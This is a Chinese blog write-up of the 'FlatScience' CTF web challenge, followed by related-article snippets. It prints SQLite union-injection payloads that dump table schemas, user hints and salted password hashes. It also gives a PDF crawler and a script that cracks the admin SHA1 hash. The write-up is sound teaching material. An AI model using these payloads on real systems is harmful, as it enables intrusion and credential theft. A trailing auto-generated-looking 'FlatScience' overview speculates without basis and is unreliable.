Web(FlatScience)

最新推荐文章于 2025-06-07 21:08:45 发布
最新推荐文章于 2025-06-07 21:08:45 发布
阅读量721 收藏
点赞数
分类专栏: CTF(攻防世界) 文章标签: p2p 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_56010012/article/details/123553206
版权

题目描述:

(1)暂时看不出来是什么类型的题目,采用御剑扫描后台,扫描网址,扫描到四个文件。

 (2)依次打开几个网址,在admin和login页面都有登陆界面,但是在admin源代码中,有提示并不能通过一些通过该界面。

 (3)主要针对login.php进行渗透操作,

 (4)根据提示,构造payload: 111.200.241.244:53862/login.php?debug 发现有特殊回显

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>

(5)上述代码提示采用的数据库为SQLite。

sqlite数据库有一张sqlite_master表,
里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息

(6)尝试SQL注入,发现有错误页面,可以推测为单引号字符型注入。

(7) 进一步操作,爆出具体字段数,具体为2。

1' order by 2--+   //回显正常
1' order by 3--+   //回显错误

usr=1' union select 1,2 from sqlite_master--+&pw=123456===》回显为2,可以知道回显为第二位。

 (8)在这里采用burpsuite修改数据包内容来进行SQL注入,根据字段为2 继续构造payload:

usr = 1' union select name,sql from sqlite_master--+&pw=123456

回显如下图返回了一张表

CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)

 (9)继续爆破,猜测flag在hint字段中,构造payload:usr=1' union select 1,group_concat(hint) from users--+&pw=123456

 返回信息为

+my+fav+word+in+my+fav+paper%3F%21%2Cmy+love+is%E2%80%A6%3F%2Cthe+password+is+password;

解码为

 my fav word in my fav paper?!,my love is…?,the password is password;

 由于该字段没有具体的含义指明flag,因此继续查看其他字段的值。

usr=1' union select 1,group_concat(id) from users--+&pw=123456
usr=1' union select 1,group_concat(name) from users--+&pw=123456
usr=1' union select 1,group_concat(password) from users--+&pw=123456

 将上述回显信息,统计为表格,需要注意的是回显信息是经过url编码的数据,所以要得到原数据,需要将其解码。

idhintnamepassword
1 my fav word in my fav paper?!admin3fab54a50e770d830c0416df817567662a9dc85c
2my love is…?fritze54eae8935c90f467427f05e4ece82cf569f89507
3,the password is passwordChansi34b0bb7c304949f9ff2fc101eef0f048be10d3bd

python爬虫代码:

import requests
import re
import os
import sys

re1 = '[a-fA-F0-9]{32,32}.pdf'
re2 = '[0-9\/]{2,2}index.html'

pdf_list = []
def get_pdf(url):
    global pdf_list
    print(url)
    req = requests.get(url).text
    re_1 = re.findall(re1,req)
    for i in re_1:
        pdf_url = url+i
        pdf_list.append(pdf_url)
    re_2 = re.findall(re2,req)
    for j in re_2:
        new_url = url+j[0:2]
        get_pdf(new_url)
    return pdf_list
    # return re_2

pdf_list = get_pdf('http://111.200.241.244:62524/')
print(pdf_list)
for i in pdf_list:
    os.system('wget '+i)


from io import StringIO
#coding:utf-8
# python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter

import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request


def get_pdf():
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_to_txt(path_to_file):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    codec = 'utf-8'
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, laparams=laparams)
    fp = open(path_to_file, 'rb')
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    password = ""
    maxpages = 0
    caching = True
    pagenos = set()

    for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password, caching=caching,
                                  check_extractable=True):
        interpreter.process_page(page)

    text = retstr.getvalue()

    fp.close()
    device.close()
    retstr.close()
    return text


def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print("Searching word in " + i)
        pdf_text = convert_pdf_to_txt("./" + i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word.encode('utf-8') + 'Salz!'.encode('utf-8')).hexdigest()
            if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
                print("Find the password :" + word)
                exit()


if __name__ == "__main__":
    find_password()

 

代码运行结果:ThinJerboa

 最后输入网页的结果

参考链接:攻防世界web进阶区FlatScience详解 - 云+社区 - 腾讯云

                   攻防世界Web:FlatScience_dofd的博客-优快云博客

攻防世界:web FlatScience
Zeker62的博客
09-08 207
目录题目分析目录扫描检查页面代码审计SQL注入题目分析 拿到题目,就有很多按钮可以点击 点开之后,发现会下载好多paper,这应该就是web坐着写的论文 点开here,this等等东西 会发现有更多的paper等着你下 下载下来的paper是全英文,估计是机器学习数学建模等东西,反正我也看不懂在手足无措的时候,直接上 目录扫描工具进行扫描 目录扫描 使用御剑扫描工具扫描,发现存在robots.t...
攻防世界 WEB FlatScience
qq_41696858的博客
08-24 283
听说这个题一开始是个1分题。。。。what??????? 这题结合了sql注入,爬虫爬取以及pdf识别内容和sha1撞库,你告诉我只有一分???????好吧,可能是我太菜了 打开场景,一堆a链接,打开看到是一堆pdf,查找一下发现也没有啥,扫描一波目录,发现robots.txt,进去看看 发现login.php和admin.php,尝试sql注入,admin页面根本没回显,好吧,那么有问题的页面就只剩一个login.php了 先尝试一个简单的单引号1’,有回显,sqlite数据库,id是注入点,后面密码明显
攻防世界 web FlatScience
tothemoon的博客
03-04 452
打开网页后每个转跳都点一下发现都是pdf文件除了here 进入了根目录1,然后点here或者these会进入不同的根目录。 这也太难看出其中的奥秘了,用dirsearch跑一下。 经过测试后:发现login.php与admin.php是解题的关键 ...
XCTF WEB FlatScience(Hack.lu-2017)
A_dmin的博客
12-13 778
XCTF WEB FlatScience(Hack.lu-2017) 打开题目,发现是一堆的跳转and pdf文档: 也没发现有何提示,,,直接robots.txt进行查看: 进行访问,admin.php页面就是admin登录的地方,,,啥都没得,,, 还有一个login.php的页面,,不明白为什么都是登录要搞两个页面,,, 右键查看源代码,得到一个提示: debug调试参数??直接传参?...
攻防世界-web-FlatScience
wuh2333的博客
10-25 778
攻防世界,webFlatScience
FlatScience XCTF web进阶区FlatScience详解
林英俊的博客
09-11 943
FlatScience XCTF web进阶区FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
XCTF Web 记录(FlatScience
ximo的博客
03-08 282
前言 今天开始每日一题,周末不更。 FlatScience 进来以后,一串英文,翻译: 最佳论文 嘿!欢迎来到我的(部分未完成)oldskool网站! 我是Flux Horst教授。。“啊,”努夫说-你应该了解我! 这是我迄今为止写的一些著名论文。 也许你自己去看看?! 试试这个或者这个或者到这里来 然后三个可以点击的位置,进去后时pdf文件,查看页面源码也没什么有用的。 查看robots.txt看看有没有信息: 啊,进去看看。 login.php: admin.php: 这里admin页面直接就
CTF 攻防世界 Web: FlatScience write-up
qq_60256199的博客
12-15 770
CTF 攻防世界 Web: FlatScience
攻防世界web进阶区FlatScience
gongjingege的博客
08-05 335
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
每日随机一题ctf——web-FlatScience【攻防世界】
hk_hkl的博客
11-10 776
涉及内容:使用御剑进行目录扫描代码审计审计出一个sql注入的点sql注入爬取所有文档提升点:模仿御剑自己编写一个扫描器通过网上的资源去学习代码审计通过网上的资源去学习sql注入通过网上的资源去学习爬虫技术(爬取所有文档+将pdf转成txt)
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
[CTF题目总结-web篇]攻防世界:flatscience
T2hunz1
01-13 1847
[CTF题目总结-web篇]攻防世界:flatscience
[P2P]并发模式
加油鸭
06-03 505
设备可以同时作为,需要硬件和驱动支持。//某些高级Wi-Fi芯片(如高通、博通)支持 Concurrent Mode(并发模式。
p2p、分布式,区块链笔记 MESH】 论文阅读 Thread/OpenThread Low-Power Wireless Multihop Net
ResumeProject的博客
06-04 1612
p2p、分布式,区块链笔记 MESH】 论文阅读 Thread/OpenThread Low-Power Wireless Multihop Net
java UDP 模板
wu_android的博客
06-05 1020
UDP(User Datagram Protocol)是一种无连接的传输层协议,在 Java 中可以使用 UDP 进行网络编程。
【计算机网络】非阻塞IO——poll实现多路转接
GGDxianv的博客
06-06 730
本文介绍了Linux系统中poll机制在网络编程中的应用,重点解析了poll函数的参数、用法及实现原理。文章首先阐述了poll作为IO多路复用技术的作用,可以同时监听多个文件描述符的读写事件。详细说明了poll函数的结构体参数pollfd和三个主要参数:fds数组、nfds监听数量以及timeout超时时间。通过代码示例展示了如何用poll实现非阻塞服务器,包括服务器初始化、事件监听、连接处理和消息接收等关键功能。最后指出了poll技术存在的几个缺点:每次调用需传入整个fd列表、线性扫描效率低、文件描述符数
【计算机网络】第七章 运输层
wuyufei_sun的博客
06-03 794
物理层、数据链路层和网络层,共同解决了将主机通过异构网络互联起来所面临的问题,实现了在计算机网络中实际进行通信的真正实体,是位于通信两端主机中的进程如何为运行在提供直接的逻辑通信服务,就是运输层的主要任务。运输层协议又称为端到端协议。
day26-计算机网络-4
最新发布
weixin_Z2024789
06-07 780
摘要:本文详细介绍了TCP协议的11种状态转换过程(CLOSED→ESTABLISHED→TIME_WAIT等),以及相关网络诊断工具的使用方法。主要内容包括:1)通过ss/netstat命令查看TCP连接状态;2)使用iftop、iperf测试网络带宽;3)wireshark/tcpdump抓包过滤技巧(IP/端口/协议过滤);4)Linux系统修改网卡名称的配置方法(CentOS/Ubuntu)。文章还包含网络状态统计、端口检测等实用命令,适合网络管理员进行连接故障排查和性能分析。
传输层协议 UDP 介绍 -- UDP 协议格式,UDP 的特点,UDP 的缓冲区
CSQCSQCC的博客
06-04 1211
本文主要是对计算机网络体系结构中传输层的 UDP 协议做了一定的介绍,包括 UDP 协议的格式,UDP 协议的特点,UDP 协议的缓冲区以及一些基于 UDP 协议的应用层协议。
FlatScience
03-29
### 关于 FlatScience 的概述 FlatScience 是一种假设的技术平台或工具名称,在当前已知的信息中并未具体提及其实现细节或功能范围。然而,基于所提供的引用内容以及常见的 IT 技术背景分析,可以推测该平台可能涉及 Web 安全测试、文件操作权限管理等领域。 在引用的内容中提到的 URL 和 PHP 源码片段表明可能存在某种安全漏洞利用场景[^1]。例如,通过构造特定参数来执行命令或者绕过文件路径限制访问敏感数据的行为,这通常属于渗透测试或安全研究范畴内的活动。而 `showing.php` 文件中的逻辑则展示了一种基本的安全防护机制设计思路——通过对输入变量 `$f` 进行多重校验以防止恶意路径穿越攻击的发生[^2]。 如果我们将这些概念映射到一个名为 “FlatScience” 的虚拟平台上,则可认为它可能是用于教育目的的教学型框架或者是实际应用于生产环境下的某类应用服务端程序之一部分实现方案而已;当然也有可能只是单纯作为案例演示存在而已,并无真实产品形态对应之物。 以下是关于此类技术和工具的一些补充说明: - **Web 应用安全性评估**:像上述例子那样针对潜在风险点进行深入剖析并采取相应措施加固系统是非常重要的工作环节。 - **编码实践规范的重要性**:从源代码可见开发者试图过滤掉可能导致危险行为的关键字符组合(如 "..", "/", "\", "pctf"),这是良好编程习惯的一部分体现形式。 - **自动化扫描与手动审查相结合的方式**:为了更全面有效地发现隐藏缺陷所在之处,往往需要借助专门开发出来的脚本程序配合人工经验来进行综合判断处理过程才行得通。 ```php <?php $f = $_GET['img']; if (!empty($f)) { $f = base64_decode($f); if (stripos($f,'..') === FALSE && stripos($f,'/') === FALSE && stripos($f,'\\') === FALSE && stripos($f,'pctf') === FALSE) { readfile($f); } else { echo "File not found!"; } } ?> ``` 此段PHP代码展示了如何验证用户请求参数的有效性和合法性之后再决定是否允许读取指定资源的操作流程图解示意如下所示: ![Flowchart](https://via.placeholder.com/500x300) 尽管如此,“FlatScience”的确切定义仍需进一步澄清才能给出更为精准详尽的回答结果出来呢!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值